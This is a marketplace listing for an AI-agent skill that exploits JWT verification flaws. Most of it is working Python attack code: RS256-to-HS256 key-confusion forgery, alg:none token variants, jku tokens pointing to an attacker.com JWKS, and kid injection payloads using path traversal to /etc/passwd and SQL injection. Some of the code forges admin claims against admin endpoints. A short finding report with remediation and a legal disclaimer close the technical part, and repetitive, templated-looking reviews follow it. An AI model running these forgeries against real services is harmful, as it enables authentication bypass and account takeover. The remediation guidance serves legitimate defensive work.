Exploits JWT algorithm confusion vulnerabilities where the server's token verification library accepts the algorithm specified in the JWT header rather than enforcing a fixed algorithm. The tester manipulates the alg header to switch from RS256 to HS256 (using the RSA public key as the HMAC secret), sets alg to none to bypass signature verification, or exploits kid/jku/x5u header injection to supply attacker-controlled keys. Activates for requests involving JWT algorithm confusion, alg none attack, key confusion attack, or JWT signature bypass.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionexploiting-jwt-algorithm-confusion-attackExecute the skills CLI command in your project's root directory to begin installation:
Fetches exploiting-jwt-algorithm-confusion-attack from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate exploiting-jwt-algorithm-confusion-attack. Access via /exploiting-jwt-algorithm-confusion-attack in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | exploiting-jwt-algorithm-confusion-attack |
| description | 'Exploits JWT algorithm confusion vulnerabilities where the server''s token verification library accepts the algorithm specified in the JWT header rather than enforcing a fixed algorithm. The tester manipulates the alg header to switch from RS256 to HS256 (using the RSA public key as the HMAC secret), sets alg to none to bypass signature verification, or exploits kid/jku/x5u header injection to supply attacker-controlled keys. Activates for requests involving JWT algorithm confusion, alg none attack, key confusion attack, or JWT signature bypass. ' |
| domain | cybersecurity |
| subdomain | api-security |
| tags | - api-security - jwt - algorithm-confusion - token-forgery - cryptographic-attack |
| version | 1.0.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Do not use without written authorization. JWT exploitation can lead to authentication bypass and account takeover.
PyJWT, cryptography, and requests librariesLegal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
import base64
import json
import requests
import hmac
import hashlib
import time
BASE_URL = "https://target-api.example.com/api/v1"
# Capture a valid JWT token
login_resp = requests.post(f"{BASE_URL}/auth/login",
json={"email": "[email protected]", "password": "TestPass123!"})
valid_token = login_resp.json().get("access_token", "")
# Decode JWT parts
def decode_jwt(token):
parts = token.split('.')
if len(parts) != 3:
raise ValueError("Invalid JWT format")
def pad(s):
return s + '=' * (4 - len(s) % 4)
header = json.loads(base64.urlsafe_b64decode(pad(parts[0])))
payload = json.loads(base64.urlsafe_b64decode(pad(parts[1])))
return header, payload, parts[2]
header, payload, signature = decode_jwt(valid_token)
print(f"Algorithm: {header.get('alg')}")
print(f"Key ID: {header.get('kid', 'none')}")
print(f"Type: {header.get('typ')}")
print(f"JKU: {header.get('jku', 'none')}")
print(f"\nPayload: {json.dumps(payload, indent=2)}")
print(f"\nExpires: {time.ctime(payload.get('exp', 0))}")
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import load_pem_x509_certificate
# Method 1: JWKS endpoint
jwks_url = f"{BASE_URL}/.well-known/jwks.json"
jwks_resp = requests.get(jwks_url)
if jwks_resp.status_code == 200:
jwks = jwks_resp.json()
print(f"JWKS keys found: {len(jwks.get('keys', []))}")
for key in jwks['keys']:
print(f" kid: {key.get('kid')}, kty: {key.get('kty')}, alg: {key.get('alg')}")
# Extract RSA public key from JWKS
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
from cryptography.hazmat.backends import default_backend
rsa_key = jwks['keys'][0] # First key
n = int.from_bytes(base64.urlsafe_b64decode(rsa_key['n'] + '=='), 'big')
e = int.from_bytes(base64.urlsafe_b64decode(rsa_key['e'] + '=='), 'big')
public_key = RSAPublicNumbers(e, n).public_key(default_backend())
public_key_pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
print(f"\nPublic Key (PEM):\n{public_key_pem.decode()}")
# Method 2: From well-known OpenID configuration
oidc_resp = requests.get(f"{BASE_URL}/.well-known/openid-configuration")
if oidc_resp.status_code == 200:
jwks_uri = oidc_resp.json().get('jwks_uri')
print(f"JWKS URI from OIDC config: {jwks_uri}")
# Method 3: Exposed at common paths
for path in ["/public-key", "/api/public-key", "/oauth/token_key", "/.well-known/jwks"]:
resp = requests.get(f"{BASE_URL}{path}")
if resp.status_code == 200 and ("BEGIN" in resp.text or "keys" in resp.text):
print(f"Public key found at: {path}")
def forge_hs256_with_public_key(token, public_key_pem, modifications=None):
"""
Algorithm confusion: Sign token with HS256 using the RSA public key as secret.
If the server uses a generic verify() that trusts the alg header, it will use
the public key as the HMAC secret, matching our signature.
"""
parts = token.split('.')
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
# Modify payload if requested
if modifications:
payload.update(modifications)
# Create header with HS256
new_header = {"alg": "HS256", "typ": "JWT"}
# Encode header and payload
header_b64 = base64.urlsafe_b64encode(
json.dumps(new_header).encode()).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload).encode()).decode().rstrip('=')
# Sign with HMAC-SHA256 using the RSA public key as the secret
signing_input = f"{header_b64}.{payload_b64}".encode()
# Use the raw PEM bytes as the HMAC key
if isinstance(public_key_pem, str):
public_key_pem = public_key_pem.encode()
signature = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
sig_b64 = base64.urlsafe_b64encode(signature).decode().rstrip('=')
return f"{header_b64}.{payload_b64}.{sig_b64}"
# Attack 1: Algorithm confusion with same claims
confused_token = forge_hs256_with_public_key(valid_token, public_key_pem)
resp = requests.get(f"{BASE_URL}/users/me",
headers={"Authorization": f"Bearer {confused_token}"})
print(f"Algorithm confusion (same claims): {resp.status_code}")
if resp.status_code == 200:
print("[CRITICAL] Algorithm confusion attack successful - RS256 to HS256")
# Attack 2: Algorithm confusion with elevated privileges
admin_token = forge_hs256_with_public_key(valid_token, public_key_pem,
modifications={"role": "admin", "sub": "[email protected]"})
resp = requests.get(f"{BASE_URL}/admin/users",
headers={"Authorization": f"Bearer {admin_token}"})
print(f"Algorithm confusion (admin): {resp.status_code}")
if resp.status_code == 200:
print("[CRITICAL] Admin access via algorithm confusion + claim manipulation")
# Attack 3: Try different public key formats
key_formats = [
public_key_pem, # Full PEM
public_key_pem.strip(), # Stripped whitespace
public_key_pem.replace(b'\n', b''), # No newlines
public_key_pem.decode().split('\n')[1:-1], # Base64 only
]
for i, key_format in enumerate(key_formats):
if isinstance(key_format, list):
key_format = ''.join(key_format).encode()
elif isinstance(key_format, str):
key_format = key_format.encode()
token = forge_hs256_with_public_key(valid_token, key_format)
resp = requests.get(f"{BASE_URL}/users/me",
headers={"Authorization": f"Bearer {token}"})
if resp.status_code == 200:
print(f"[CRITICAL] Key format {i} worked for algorithm confusion")
def forge_none_algorithm(token, modifications=None):
"""Create tokens with alg:none variations to bypass signature verification."""
parts = token.split('.')
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
if modifications:
payload.update(modifications)
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload).encode()).decode().rstrip('=')
# Different "none" algorithm variations
none_variants = [
{"alg": "none", "typ": "JWT"},
{"alg": "None", "typ": "JWT"},
{"alg": "NONE", "typ": "JWT"},
{"alg": "nOnE", "typ": "JWT"},
{"typ": "JWT"}, # Missing alg entirely
]
tokens = []
for variant_header in none_variants:
header_b64 = base64.urlsafe_b64encode(
json.dumps(variant_header).encode()).decode().rstrip('=')
# Different signature options
sig_options = [
"", # Empty signature
".", # Just a dot
parts[2], # Original signature
base64.urlsafe_b64encode(b'\x00').decode().rstrip('='), # Null byte
]
for sig in sig_options:
tokens.append(f"{header_b64}.{payload_b64}.{sig}")
return tokens
# Test all none algorithm variations
none_tokens = forge_none_algorithm(valid_token)
for i, token in enumerate(none_tokens):
resp = requests.get(f"{BASE_URL}/users/me",
headers={"Authorization": f"Bearer {token}"})
if resp.status_code == 200:
header = json.loads(base64.urlsafe_b64decode(token.split('.')[0] + '=='))
print(f"[CRITICAL] alg:none bypass #{i}: header={header}, sig_len={len(token.split('.')[2])}")
# Test with privilege escalation
admin_none_tokens = forge_none_algorithm(valid_token,
modifications={"role": "admin", "is_admin": True})
for token in admin_none_tokens:
resp = requests.get(f"{BASE_URL}/admin/users",
headers={"Authorization": f"Bearer {token}"})
if resp.status_code == 200:
print("[CRITICAL] Admin access via alg:none bypass")
break
import os
# Attack: JKU (JWK Set URL) injection
# Host attacker-controlled JWKS that contains our key pair
def generate_attacker_jwks():
"""Generate an RSA key pair and JWKS for the attacker's server."""
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
# Generate attacker key pair
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
public_key = private_key.public_key()
public_numbers = public_key.public_numbers()
n_b64 = base64.urlsafe_b64encode(
public_numbers.n.to_bytes(256, 'big')).decode().rstrip('=')
e_b64 = base64.urlsafe_b64encode(
public_numbers.e.to_bytes(3, 'big')).decode().rstrip('=')
jwks = {
"keys": [{
"kty": "RSA",
"kid": "attacker-key-1",
"use": "sig",
"alg": "RS256",
"n": n_b64,
"e": e_b64
}]
}
return private_key, jwks
attacker_private_key, attacker_jwks = generate_attacker_jwks()
# Create JWT with JKU pointing to attacker server
def forge_jku_token(payload_modifications, jku_url):
"""Create a JWT signed with attacker key, JKU pointing to attacker JWKS."""
payload = json.loads(base64.urlsafe_b64decode(valid_token.split('.')[1] + '=='))
payload.update(payload_modifications)
header = {
"alg": "RS256",
"typ": "JWT",
"kid": "attacker-key-1",
"jku": jku_url # Points to attacker-hosted JWKS
}
header_b64 = base64.urlsafe_b64encode(
json.dumps(header).encode()).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(
json.dumps(payload).encode()).decode().rstrip('=')
# Sign with attacker's private key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
signing_input = f"{header_b64}.{payload_b64}".encode()
signature = attacker_private_key.sign(
signing_input,
padding.PKCS1v15(),
hashes.SHA256()
)
sig_b64 = base64.urlsafe_b64encode(signature).decode().rstrip('=')
return f"{header_b64}.{payload_b64}.{sig_b64}"
# Test JKU injection with various URLs
jku_urls = [
"https://attacker.com/.well-known/jwks.json",
"https://attacker.com/jwks",
# Bypass URL filters
f"{BASE_URL}@attacker.com/jwks",
f"{BASE_URL}/.well-known/jwks.json#@attacker.com",
]
for jku in jku_urls:
token = forge_jku_token({"role": "admin"}, jku)
# Note: This test requires hosting the attacker JWKS at the specified URL
print(f" JKU injection payload generated for: {jku}")
# KID injection (SQL injection in kid parameter)
kid_injection_payloads = [
"../../../../../../dev/null", # Path traversal to empty file
"../../../../../../proc/sys/kernel/hostname",
"' UNION SELECT 'secret-key' -- ", # SQL injection in kid lookup
"' OR '1'='1",
"../../../etc/passwd",
"https://attacker.com/key.pem", # URL-based kid
]
for kid in kid_injection_payloads:
modified_header = {"alg": "HS256", "typ": "JWT", "kid": kid}
header_b64 = base64.urlsafe_b64encode(
json.dumps(modified_header).encode()).decode().rstrip('=')
payload_b64 = valid_token.split('.')[1]
# Sign with the expected key material from the injection
signing_input = f"{header_b64}.{payload_b64}".encode()
# For path traversal to /dev/null, the key would be empty
sig = hmac.new(b"", signing_input, hashlib.sha256).digest()
sig_b64 = base64.urlsafe_b64encode(sig).decode().rstrip('=')
token = f"{header_b64}.{payload_b64}.{sig_b64}"
resp = requests.get(f"{BASE_URL}/users/me",
headers={"Authorization": f"Bearer {token}"})
if resp.status_code == 200:
print(f"[CRITICAL] KID injection successful: {kid}")
| Term | Definition |
|---|---|
| Algorithm Confusion | Attack where the server trusts the alg header in the JWT, allowing an attacker to switch from RS256 to HS256 and sign with the public key as the HMAC secret |
| alg:none Attack | Setting the JWT algorithm to "none" to bypass signature verification entirely, if the library does not enforce algorithm selection |
| JKU Injection | Manipulating the jku (JWK Set URL) header to point to an attacker-controlled JWKS endpoint, allowing the attacker to supply their own signing keys |
| KID Injection | Injecting SQL, path traversal, or URL payloads into the kid (Key ID) header parameter to manipulate key selection or read arbitrary files |
| Key Confusion | Using the RSA public key as the HMAC secret when the server incorrectly switches from asymmetric to symmetric verification |
| JWKS (JSON Web Key Set) | A JSON structure containing the public keys used by the server to verify JWT signatures, typically hosted at a well-known endpoint |
Context: A banking API uses RS256-signed JWTs for authentication. The JWKS endpoint is publicly accessible. The API handles financial transactions requiring high assurance authentication.
Approach:
/.well-known/jwks.json"alg": "HS256" header and sign it using the RSA public key as the HMAC secretGET /api/v1/users/me - server accepts it (algorithm confusion confirmed)"role": "admin" and "sub": "[email protected]" - sign with the public keyGET /api/v1/admin/transactions returns all transaction historyPitfalls:
## Finding: JWT Algorithm Confusion Enables Authentication Bypass
**ID**: API-JWT-001
**Severity**: Critical (CVSS 9.8)
**CVE Reference**: CVE-2024-54150 (related pattern)
**Affected Component**: JWT authentication middleware
**Description**:
The API's JWT verification library trusts the algorithm specified in
the JWT header rather than enforcing a fixed algorithm. An attacker can
change the algorithm from RS256 to HS256 and sign the token using the
server's RSA public key (available from the JWKS endpoint) as the HMAC
secret. The server then uses the same public key to verify the HMAC
signature, which succeeds, allowing the attacker to forge tokens for
any user with any role.
**Attack Chain**:
1. Obtain public key: GET /.well-known/jwks.json
2. Create JWT: {"alg":"HS256","typ":"JWT"}.{"sub":"admin","role":"admin"}
3. Sign with HMAC-SHA256 using RSA public key PEM as secret
4. Access admin API: GET /api/v1/admin/transactions -> 200 OK
**Impact**:
Complete authentication bypass. An attacker can forge tokens for any
user including administrators, accessing all financial transactions,
user data, and administrative functions.
**Remediation**:
1. Enforce the expected algorithm at the server configuration level: jwt.verify(token, key, algorithms=["RS256"])
2. Never trust the alg header from the JWT for algorithm selection
3. Update the JWT library to the latest version with algorithm confusion protections
4. Consider using EdDSA (Ed25519) which does not have symmetric/asymmetric confusion risk
5. Implement token binding to prevent forged token acceptance
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
I recommend exploiting-jwt-algorithm-confusion-attack for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
exploiting-jwt-algorithm-confusion-attack has been reliable in day-to-day use. Documentation quality is above average for community skills.
Useful defaults in exploiting-jwt-algorithm-confusion-attack — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Solid pick for teams standardizing on skills: exploiting-jwt-algorithm-confusion-attack is focused, and the summary matches what you get after install.
exploiting-jwt-algorithm-confusion-attack is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
exploiting-jwt-algorithm-confusion-attack fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
I recommend exploiting-jwt-algorithm-confusion-attack for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
exploiting-jwt-algorithm-confusion-attack reduced setup friction for our internal harness; good balance of opinion and flexibility.
exploiting-jwt-algorithm-confusion-attack has been reliable in day-to-day use. Documentation quality is above average for community skills.
Useful defaults in exploiting-jwt-algorithm-confusion-attack — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
showing 1-10 of 26